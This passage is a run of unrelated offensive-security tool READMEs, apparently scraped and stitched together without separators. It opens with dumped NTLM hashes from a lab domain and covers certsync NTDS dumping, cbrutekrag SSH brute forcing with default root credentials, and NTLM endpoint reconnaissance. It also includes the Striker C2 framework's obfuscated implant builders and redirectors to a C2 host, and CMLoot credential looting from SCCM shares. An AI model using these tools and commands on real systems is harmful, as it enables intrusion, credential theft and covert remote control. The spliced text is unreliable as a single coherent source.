ESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::
ESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
ESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
ESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb 5c9d37021:::
ESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
ESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
ESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::
ESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
ESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Contrary to what we may think, the attack is not at all slower.
git clone https://github.com/zblurx/certsync
cd certsync
pip install .
or
pip install certsync
$ certsync -h
usage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username] [-p password] [-hashes LMHASH:NTHASH]
[-no-pass] [-k] [-aesKey hex key] [-use-kcache] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver] [-dns-tcp] [-dc-ip ip address]
[-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]
Dump NTDS with golden certificates and PKINIT
options:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
-outputfile OUTPUTFILE
base output filename
CA options:
-ca-pfx pfx/p12 file name
Path to CA certificate
-ca-ip ip address IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP
authenticati on options:
-d domain.local, -domain domain.local
Domain name
-u username, -username username
Username
-p password, -password password
Password
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it
will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-use-kcache Use Kerberos authe ntication from ccache file (KRB5CCNAME)
-kdcHost KDCHOST FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
connection options:
-scheme ldap scheme
-ns nameserver Nameserver for DNS resolution
-dns-tcp Use TCP instead of UDP for DNS queries
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
OPSEC options:
-ldap-filter LDAP_FILTER
ldap filter to dump users. Default is (&(|(objectCategory=person)(objectClass=computer))(objectClass=user))
-template cert.pfx base template to use in order to forge certificates
-timeout timeout Timeout between PKINIT connection
-jitter jitter Jitter between PKINIT connecti on
-randomize Randomize certificate generation. Takes longer to generate all the certificates
DSRUAPI is more and more monitored and sometimes retricted by EDR solutions. Moreover, certsync
does not require to use a Domain Administrator, it only require a CA Administrator.
This attack needs:
Since we cannot PKINIT for users that are revoked, we cannot dump thier hashes.
Some options were added to customize the behaviour of the tool:
-ldap-filter
: change the LDAP filter used to select usernames to certsync.-template
: use an already delivered certificate to mimic it when forging users certificates.-timeout
and -jitter
: change timeout between PKINIT authentication requests.-randomize
: By default, every forged user certificates will have the same private key, serial number and validity dates. This parameter will randomize them, but the forging will take longer.Penetration tests on SSH servers using dictionary attacks. Written in C.
brute krag means "brute force" in afrikΓ‘ans
This tool is for ethical testing purpose only.
cbrutekrag and its owners can't be held responsible for misuse by users.
Users have to act as permitted by local law rules.
Β
cbrutekrag uses libssh - The SSH Library (http://www.libssh.org/)
Requirements:
make
gcc
compilerlibssh-dev
git clone --depth=1 https://github.com/matricali/cbrutekrag.git
cd cbrutekrag
make
make install
Requirements:
cmake
gcc
compilermake
libssl-dev
libz-dev
git clone --depth=1 https://github.com/matricali/cbrutekrag.git
cd cbrutekrag
bash static-build.sh
make install
$ cbrutekrag -h
_ _ _
| | | | | |
___ | |__ _ __ _ _| |_ ___| | ___ __ __ _ __ _
/ __|| '_ \| '__| | | | __/ _ \ |/ / '__/ _` |/ _` |
| (__ | |_) | | | |_| | || __/ <| | | (_| | (_| |
\___||_.__/|_| \__,_|\__\___|_|\_\_| \__,_|\__, |
OpenSSH Brute force tool 0.5.0 __/ |
(c) Copyright 2014-2022 Jorge Matricali |___/
usage: ./cbrutekrag [-h] [-v] [-aA] [-D] [-P] [-T TARGETS.lst] [-C combinations.lst]
[-t THREADS] [-o OUTPUT.txt] [TARGETS...]
-h This help
-v Verbose mode
-V Verbose mode (sshlib)
-s Scan mode
-D Dry run
-P Progress bar
-T <targets> Targets file
-C <combinations> Username and password file -t <threads> Max threads
-o <output> Output log file
-a Accepts non OpenSSH servers
-A Allow servers detected as honeypots.
cbrutekrag -T targets.txt -C combinations.txt -o result.log
cbrutekrag -s -t 8 -C combinations.txt -o result.log 192.168.1.0/24
root root
root password
root $BLANKPASS$
NTLMRecon is a Golang version of the original NTLMRecon utility written by Sachin Kamath (AKA pwnfoo). NTLMRecon can be leveraged to perform brute forcing against a targeted webserver to identify common application endpoints supporting NTLM authentication. This includes endpoints such as the Exchange Web Services endpoint which can often be leveraged to bypass multi-factor authentication.
The tool supports collecting metadata from the exposed NTLM authentication endpoints including information on the computer name, Active Directory domain name, and Active Directory forest name. This information can be obtained without prior authentication by sending an NTLM NEGOTIATE_MESSAGE packet to the server and examining the NTLM CHALLENGE_MESSAGE returned by the targeted server. We have also published a blog post alongside this tool discussing some of the motiviations behind it's development and how we are approaching more advanced metadata collectoin within Chariot.
We wanted to perform brute-forcing and automated identification of exposed NTLM authentication endpoints within Chariot, our external attack surface management and continuous automated red teaming platform. Our primary backend scanning infrastructure is written in Golang and we didn't want to have to download and shell out to the NTLMRecon utility in Python to collect this information. We also wanted more control over the level of detail of the information we collected, etc.
The following command can be leveraged to install the NTLMRecon utility. Alternatively, you may download a precompiled version of the binary from the releases tab in GitHub.
go install github.com/praetorian-inc/NTLMRecon/cmd/NTLMRecon@latest
The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM authentication endpoints:
NTLMRecon -t https://autodiscover.contoso.com
The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM endpoints while outputting collected metadata in a JSON format:
NTLMRecon -t https://autodiscover.contoso.com -o json
Below is an example JSON output with the data we collect from the NTLM CHALLENGE_MESSAGE returned by the server:
{
"url": "https://autodiscover.contoso.com/EWS/",
"ntlm": {
"netbiosComputerName": "MSEXCH1",
"netbiosDomainName": "CONTOSO",
"dnsDomainName": "na.contoso.local",
"dnsComputerName": "msexch1.na.contoso.local",
"forestName": "contoso.local"
}
}
β ~ NTLMRecon -t https://adfs.contoso.com -o json | jq
{
"url": "https://adfs.contoso.com/adfs/services/trust/2005/windowstransport",
"ntlm": {
"netbiosComputerName": "MSFED1",
"netbiosDomainName": "CONTOSO",
"dnsDomainName": "corp.contoso.com",
"dnsComputerName": "MSEXCH1.corp.contoso.com",
"forestName": "contoso.com"
}
}
β ~ NTLMRecon -t https://autodiscover.contoso.com
https://autodiscover.contoso.com/Autodiscover
https://autodiscover.contoso.com/Autodiscover/AutodiscoverService.svc/root
https://autodiscover.contoso.com/Autodiscover/Autodiscover.xml
https://autodiscover.contoso.com/EWS/
https://autodiscover.contoso.com/OAB/
https://autodiscover.contoso.com/Rpc/
β ~
Our methodology when developing this tool has targeted the most barebones version of the desired capability for the initial release. The goal for this project was to create an initial tool we could integrate into Chariot and then allow community contributions and feedback to drive additional tooling improvements or functionality. Below are some ideas for additional functionality which could be added to NTLMRecon:
[1] https://www.praetorian.com/blog/automating-the-discovery-of-ntlm-authentication-endpoints/
Nuclear Pond is used to leverage Nuclei in the cloud with unremarkable speed, flexibility, and perform internet wide scans for far less than a cup of coffee.
It leverages AWS Lambda as a backend to invoke Nuclei scans in parallel, choice of storing json findings in s3 to query with AWS Athena, and is easily one of the cheapest ways you can execute scans in the cloud.
Think of Nuclear Pond as just a way for you to run Nuclei in the cloud. You can use it just as you would on your local machine but run them in parallel and with however many hosts you want to specify. All you need to think of is the nuclei command line flags you wish to pass to it.
To install Nuclear Pond, you need to configure the backend terraform module. You can do this by running terraform apply
or by leveraging terragrunt.
$ go install github.com/DevSecOpsDocs/nuclearpond@latest
You can either pass in your backend with flags or through environment variables. You can use -f
or --function-name
to specify your Lambda function and -r
or --region
to the specified region. Below are environment variables you can use.
AWS_LAMBDA_FUNCTION_NAME
is the name of your lambda function to execute the scans onAWS_REGION
is the region your resources are deployedNUCLEARPOND_API_KEY
is the API key for authenticating to the APIAWS_DYNAMODB_TABLE
is the dynamodb table to store API scan statesBelow are some of the flags you can specify when running nuclearpond
. The primary flags you need are -t
or -l
for your target(s), -a
for the nuclei args, and -o
to specify your output. When specifying Nuclei args you must pass them in as base64 encoded strings by performing -a $(echo -ne "-t dns" | base64)
.
Below are the subcommands you can execute within nuclearpond.
To run nuclearpond subcommand nuclearpond run -t devsecopsdocs.com -r us-east-1 -f jwalker-nuclei-runner-function -a $(echo -ne "-t dns" | base64) -o cmd -b 1
in which the target is devsecopsdocs.com
, region is us-east-1
, lambda function name is jwalker-nuclei-runner-function
, nuclei arguments are -t dns
, output is cmd
, and executes one function through a batch of one host through -b 1
.
$ nuclearpond run -h
Executes nuclei tasks in parallel by invoking lambda asynchronously
Usage:
nuclearpond run [flags]
Flags:
-a, --args string nuclei arguments as base64 encoded string
-b, --batch-size int batch size for number of targets per execution (default 1)
-f, --function-name string AWS Lambda function name
-h, --help help for run
-o, --output string output type to save nuclei results(s3, cmd, or json) (default "cmd")
-r, --region string AWS region to run nuclei
-s, --silent silent command line output
-t, --target string individual target to specify
-l, --targets string list of targets in a file
-c, --threads int number of threads to run lambda funct ions, default is 1 which will be slow (default 1)
The terraform module by default downloads the templates on execution as well as adds the templates as a layer. The variables to download templates use the terraform github provider to download the release zip. The folder name within the zip will be located within /opt
. Since Nuclei downloads them on run we do not have to but to improve performance you can specify -t /opt/nuclei-templates-9.3.4/dns
to execute templates from the downloaded zip. To specify your own templates you must reference a release. When doing so on your own repository you must specify these variables in the terraf orm module, github_token
is not required if your repository is public.
If you have specified s3
as the output, your findings will be located in S3. The fastest way to get at them is to do so with Athena. Assuming you setup the terraform-module as your backend, all you need to do is query them directly through athena. You may have to configure query results if you have not done so already.
select
*
from
nuclei_db.findings_db
limit 10;
In order to get down into queries a little deeper, I thought I would give you a quick example. In the select statement we drill down into info
column, "matched-at"
column must be in double quotes due to -
character, and you are searching only for high and critical findings generated by Nuclei.
SELECT
info.name,
host,
type,
info.severity,
"matched-at",
info.description,
template,
dt
FROM
"nuclei_db"."findings_db"
where
host like '%devsecopsdocs.com'
and info.severity in ('high','critical')
The backend infrastructure, all within terraform module. I would strongly recommend reading the readme associated to it as it will have some important notes.
Striker is a simple Command and Control (C2) program.
This project is under active development. Most of the features are experimental, with more to come. Expect breaking changes.
A) Agents
B) Backend / Teamserver
C) User Interface
Clone the repo;
$ git clone https://github.com/4g3nt47/Striker.git
$ cd Striker
The codebase is divided into 4 independent sections;
This handles all server-side logic for both operators and agents. It is a NodeJS
application made with;
express
- For the REST API.socket.io
- For Web Socket communtication.mongoose
- For connecting to MongoDB.multer
- For handling file uploads.bcrypt
- For hashing user passwords.The source code is in the backend/
directory. To setup the server;
Striker uses MongoDB as backend database to store all important data. You can install this locally on your machine using this guide for debian-based distros, or create a free one with MongoDB Atlas (A database-as-a-service platform).
$ cd backend
$ npm install
$ mkdir static
You can use this folder to host static files on the server. This should also be where your UPLOAD_LOCATION
is set to in the .env
file (more on this later), but this is not necessary. Files in this directory will be publicly accessible under the path /static/
.
.env
file;NOTE: Values between <
and >
are placeholders. Replace them with appropriate values (including the <>
). For fields that require random strings, you can generate them easily using;
$ head -c 100 /dev/urandom | sha256sum
DB_URL=<your MongoDB connection URL>
HOST=<host to listen on (default: 127.0.0.1)>
PORT=<port to listen on (default: 3000)>
SECRET=<random string to use for signing session cookies and encrypting session data>
ORIGIN_URL=<full URL of the server you will be hosting the frontend at. Used to setup CORS>
REGISTRATION_KEY=<random string to use for authentication during signup>
MAX_UPLOAD_SIZE=<max file upload size, in bytes>
UPLOAD_LOCATION=<directory to store uploaded files to (default: static)>
SSL_KEY=<your SSL key file (optional)>
SSL_CERT=<your SSL cert file (optional)>
Note that SSL_KEY
and SSL_CERT
are optional. If any is not defined, a plain HTTP server will be created. This helps avoid needless overhead when running the server behind an SSL-enabled reverse proxy on the same host.
$ node index.js
[12:45:30 PM] Connecting to backend database...
[12:45:31 PM] Starting HTTP server...
[12:45:31 PM] Server started on port: 3000
This is the web UI used by operators. It is a single page web application written in Svelte, and the source code is in the frontend/
directory.
To setup the frontend;
$ cd frontend
$ npm install
.env
file with the variable VITE_STRIKER_API
set to the full URL of the C2 server as configured above;VITE_STRIKER_API=https://c2.striker.local
$ npm run build
The above will compile everything into a static web application in dist/
directory. You can move all the files inside into the web root of your web server, or even host it with a basic HTTP server like that of python;
$ cd dist
$ python3 -m http.server 8000
Register
button.REGISTRATION_KEY
in backend/.env
)This will create a standard user account. You will need an admin account to access some features. Your first admin account must be created manually, afterwards you can upgrade and downgrade other accounts in the Users
tab of the web UI.
To create your first admin account;
users
collection and set the admin
field of the target user to true
;There are different ways you can do this. If you have mongo
available in you CLI, you can do it using;
$ mongo <your MongoDB connection URL>
> db.users.updateOne({username: "<your username>"}, {$set: {admin: true}})
You should get the following response if it works;
{ "acknowledged" : true, "matchedCount" : 1, "modifiedCount" : 1 }
You can now login :)
A) Dumb Pipe Redirection
A dumb pipe redirector written for Striker is available at redirector/redirector.py
. Obviously, this will only work for plain HTTP traffic, or for HTTPS when SSL verification is disabled (you can do this by enabling the INSECURE_SSL
macro in the C agent).
The following example listens on port 443
on all interfaces and forward to c2.example.org
on port 443
;
$ cd redirector
$ ./redirector.py 0.0.0.0:443 c2.example.org:443
[*] Starting redirector on 0.0.0.0:443...
[+] Listening for connections...
B) Nginx Reverse Proxy as Redirector
$ sudo apt install nginx
/etc/nginx/sites-available/striker
);Placeholders;
<domain-name>
- This is your server's FQDN, and should match the one in you SSL cert.<ssl-cert>
- The SSL cert file to use.<ssl-key>
- The SSL key file to use.<c2-server>
- The full URL of the C2 server to forward requests to.WARNING: client_max_body_size
should be as large as the size defined by MAX_UPLOAD_SIZE
in your backend/.env
file, or uploads for large files will fail.
server {
listen 443 ssl;
server_name <domain-name>;
ssl_certificate <ssl-cert>;
ssl_certificate_key <ssl-key>;
client_max_body_size 100M;
access_log /var/log/nginx/striker.log;
location / {
proxy_pass <c2-server>;
proxy_redirect off;
proxy_ssl_verify off;
proxy_read_timeout 90;
proxy_http_version 1.0;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
}
$ sudo ln -s /etc/nginx/sites-available/striker /etc/nginx/sites-enabled/striker
$ sudo service nginx restart
Your redirector should now be up and running on port 443
, and can be tested using (assuming your FQDN is striker.local
);
$ curl https://striker.local
If it works, you should get the 404 response used by the backend, like;
{"error":"Invalid route!"}
A) The C Agent
These are the implants used by Striker. The primary agent is written in C, and is located in agent/C/
. It supports both linux and windows hosts. The linux agent depends externally on libcurl
, which you will find installed in most systems.
The windows agent does not have an external dependency. It uses wininet
for comms, which I believe is available on all windows hosts.
Assuming you're on a 64 bit host, the following will build for 64 host;
$ cd agent/C
$ mkdir bin
$ make
To build for 32 bit on 64;
$ sudo apt install gcc-multilib
$ make arch=32
The above compiles everything into the bin/
directory. You will need only two files to generate working implants;
bin/stub
- This is the agent stub that will be used as template to generate working implants.bin/builder
- This is what you will use to patch the agent stub to generate working implants.The builder accepts the following arguments;
$ ./bin/builder
[-] Usage: ./bin/builder <url> <auth_key> <delay> <stub> <outfile>
Where;
<url>
- The server to report to. This should ideally be a redirector, but a direct URL to the server will also work.<auth_key>
- The authentication key to use when connecting to the C2. You can create this in the auth keys tab of the web UI.<delay>
- Delay between each callback, in seconds. This should be at least 2, depending on how noisy you want it to be.<stub>
- The stub file to read, bin/stub
in this case.<outfile>
- The output filename of the new implant.Example;
$ ./bin/builder https://localhost:3000 979a9d5ace15653f8ffa9704611612fc 5 bin/stub bin/striker
[*] Obfuscating strings...
[+] 69 strings obfuscated :)
[*] Finding offsets of our markers...
[+] Offsets:
URL: 0x0000a2e0
OBFS Key: 0x0000a280
Auth Key: 0x0000a2a0
Delay: 0x0000a260
[*] Patching...
[+] Operation completed!
You will need MinGW for this. The following will install the 32 and 64 bit dev windows environment;
$ sudo apt install mingw-w64
Build for 64 bit;
$ cd agent/C
$ mdkir bin
$ make target=win
To compile for 32 bit;
$ make target=win arch=32
This will compile everything into the bin/
directory, and you will have the builder and the stub as bin\stub.exe
and bin\builder.exe
, respectively.
B) The Python Agent
Striker also comes with a self-contained python agent (tested on python 2.7.16 and 3.7.3). This is located at agent/python/
. Only the most basic features are implemented in this agent. Useful for hosts that can't run the C agent but have python installed.
There are 2 file in this directory;
stub.py
- This is the payload stub to pass to the builder.builder.py
- This is what you'll be using to generate an implant.Usage example:
$ ./builder.py
[-] Usage: builder.py <url> <auth_key> <delay> <stub> <outfile>
# The following will generate a working payload as `output.py`
$ ./builder.py http://localhost:3000 979a9d5ace15653f8ffa9704611612fc 2 stub.py output.py
[*] Loading agent stub...
[*] Writing configs...
[+] Agent built successfully: output.py
# Run it
$ python3 output.py
After following the above instructions, Striker should now be ready for use. Kindly go through the usage guide. Have fun, and happy hacking!
If you like the project, consider helping me turn coffee into code!
CMLoot was created to easily find interesting files stored on System Center Configuration Manager (SCCM/CM) SMB shares. The shares are used for distributing software to Windows clients in Windows enterprise environments and can contains scripts/configuration files with passwords, certificates (pfx), etc. Most SCCM deployments are configured to allow all users to read the files on the shares, sometimes it is limited to computer accounts.
The Content Library of SCCM/CM have a "complex" (annoying) file structure which CMLoot will untangle for you: https://techcommunity.microsoft.com/t5/configuration-manager-archive/understanding-the-configuration-manager-content-library/ba-p/273349
Essentially the DataLib folder contains .INI files, the .INI file are named the original filename + .INI. The .INI file contains a hash of the file, and the file itself is stored in the FileLib in format of <folder name: 4 first chars of the hash>\fullhash.
It is possible to apply Access control to packages in CM. This however only protects the folder for the file descriptor (DataLib), not the actual file itself. CMLoot will during inventory record any package that it can't access (Access denied) to the file _noaccess.txt. Invoke-CMLootHunt can then use this file to enumerate the actual files that the access control is trying to protect.
Windows Defender for Endpoint (EDR) or other security mechanisms might trigger because the script parses a lot of files over SMB.
Find CM servers by searching for them in Active Directory or by fetching this reqistry key on a workstation with System Center installed:
(Get-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\SMS\DP -Name ManagementPoints).ManagementPoints
There may be multiple CM servers deployed and they can contain different files so be sure to find all of them.
Then you need to create an inventory file which is just a text file containing references to file descriptors (.INI). The following command will parse all .INI files on the SCCM server to create a list of files available.
PS> Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt
Then use the inventory file created above to download files of interest:
Select files using GridView (Milage may vary with large inventory files):
PS> Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -GridSelect
Download a single file, by coping a line in the inventory text:
PS> Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml
Download all files with a certain file extension:
PS> Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension ps1
Files will by default download to CMLootOut in the folder from which you execute the script, can be changed with -OutFolder parameter. Files are saved in the format of (folder: filext)\(first 4 chars of hash>_original filename).
Hunt for files that CMLootInventory found inaccessible:
Invoke-CMLootHunt -SCCMHost sccm -NoAccessFile sccmfiles_noaccess.txt
Bulk extract MSI files:
Invoke-CMLootExtract -Path .\CMLootOut\msi
Run inventory, scanning available files:
Select files using GridSelect:
Hunt "inaccessible" files and MSI extract:
Tomas Rzepka / WithSecure
fingerprintx
is a utility similar to httpx that also supports fingerprinting services like as RDP, SSH, MySQL, PostgreSQL, Kafka, etc. fingerprintx
can be used alongside port scanners like Naabu to fingerprint a set of ports identified during a port scan. For example, an engineer may wish to scan an IP range and then rapidly fingerprint the service running on all the discovered ports.
SERVICE | TRANSPORT | SERVICE | TRANSPORT |
---|---|---|---|
HTTP | TCP | REDIS | TCP |
SSH | TCP | MQTT3 | TCP |
MODBUS | TCP | VNC | TCP |
TELNET | TCP | MQTT5 | TCP |
FTP | TCP | RSYNC | TCP |
SMB | TCP | RPC | TCP |
DNS | TCP | OracleDB | TCP |
SMTP | TCP | RTSP | TCP |
PostgreSQL | TCP | MQTT5 | TCP (TLS) |
RDP | TCP | HTTPS | TCP (TLS) |
POP3 | TCP | SMTPS | TCP (TLS) |
KAFKA | TCP | MQTT3 | TCP (TLS) |
MySQL | TCP | RDP | TCP (TLS) |
MSSQL | TCP | POP3S | TCP (TLS) |
LDAP | TCP | LDAPS | TCP (TLS) |
IMAP | TCP | IMAPS | TCP (TLS) |
SNMP | UDP | Kafka | TCP (TLS) |
OPENVPN | UDP | NETBIOS-NS | UDP |
IPSEC | UDP | DHCP | UDP |
STUN | UDP | NTP | UDP |
DNS | UDP |
From Github
go install github.com/praetorian-inc/fingerprintx/cmd/fingerprintx@latest
From source (go version > 1.18)
$ git clone git@github.com:praetorian-inc/fingerprintx.git
$ cd fingerprintx
# with go version > 1.18
$ go build ./cmd/fingerprintx
$ ./fingerprintx -h
Docker
$ git clone git@github.com:praetorian-inc/fingerprintx.git
$ cd fingerprintx
# build
docker build -t fingerprintx .
# and run it
docker run --rm fingerprintx -h
docker run --rm fingerprintx -t praetorian.com:80 --json
fingerprintx -h
The -h
option will display all of the supported flags for fingerprintx
.
Usage:
fingerprintx [flags]
TARGET SPECIFICATION:
Requires a host and port number or ip and port number. The port is assumed to be open.
HOST:PORT or IP:PORT
EXAMPLES:
fingerprintx -t praetorian.com:80
fingerprintx -l input-file.txt
fingerprintx --json -t praetorian.com:80,127.0.0.1:8000
Flags:
--csv output format in csv
-f, --fast fast mode
-h, --help help for fingerprintx
--json output format in json
-l, --list string input file containing targets
-o, --output string output file
-t, --targets strings target or comma separated target list
-w, --timeout int timeout (milliseconds) (default 500)
-U, --udp run UDP plugins
-v, --verbose verbose mode
The fast
mode will only attempt to fingerprint the default service associated with that port for each target. For example, if praetorian.com:8443
is the input, only the https
plugin would be run. If https
is not running on praetorian.com:8443
, there will be NO output. Why do this? It's a quick way to fingerprint most of the services in a large list of hosts (think the 80/20 rule).
With one target:
$ fingerprintx -t 127.0.0.1:8000
http://127.0.0.1:8000
By default, the output is in the form: SERVICE://HOST:PORT
. To get more detailed service output specify JSON with the --json
flag:
$ fingerprintx -t 127.0.0.1:8000 --json
{"ip":"127.0.0.1","port":8000,"service":"http","transport":"tcp","metadata":{"responseHeaders":{"Content-Length":["1154"],"Content-Type":["text/html; charset=utf-8"],"Date":["Mon, 19 Sep 2022 18:23:18 GMT"],"Server":["SimpleHTTP/0.6 Python/3.10.6"]},"status":"200 OK","statusCode":200,"version":"SimpleHTTP/0.6 Python/3.10.6"}}
Pipe in output from another program (like naabu):
$ naabu 127.0.0.1 -silent 2>/dev/null | fingerprintx
http://127.0.0.1:8000
ftp://127.0.0.1:21
Run with an input file:
$ cat input.txt | fingerprintx
http://praetorian.com:80
telnet://telehack.com:23
# or if you prefer
$ fingerprintx -l input.txt
http://praetorian.com:80
telnet://telehack.com:23
With more metadata output:
Nmap is the standard for network scanning. Why use fingerprintx
instead of nmap? The main two reasons are:
fingerprintx
works smarter, not harder: the first plugin run against a server with port 8080 open is the http plugin. The default service approach cuts down scanning time in the best case. Most of the time the services running on port 80, 443, 22 are http, https, and ssh -- so that's what fingerprintx
checks first.fingerprintx
supports json output with the --json
flag. Nmap supports numerous output options (normal, xml, grep), but they are often hard to parse and script appropriately. fingerprintx
supports json output which eases integration with other tools in processing pipelines.third_party
folder that imports the Go cryptography libraries? ssh
fingerprinting module identifies the various cryptographic options supported by the server when collecting metadata during the handshake process. This makes use of a few unexported functions, which is why the Go cryptography libraries are included here with an export.go file.target:port
input is open. If none of the ports are open there will be no output as there are no services running on the targets.zgrab2
command line usage (and use case) is slightly different than fingerprintx
. For zgrab2
, the protocol must be specified ahead of time: echo praetorian.com | zgrab2 http -p 8000
, which assumes you already know what is running there. For fingerprintx
, that is not the case: echo praetorian.com:8000 | fingerprintx
. The "application layer" protocol scanning approach is very similar.fingerprintx
is the work of a lot of people, including our great intern class of 2022. Here is a list of contributors so far: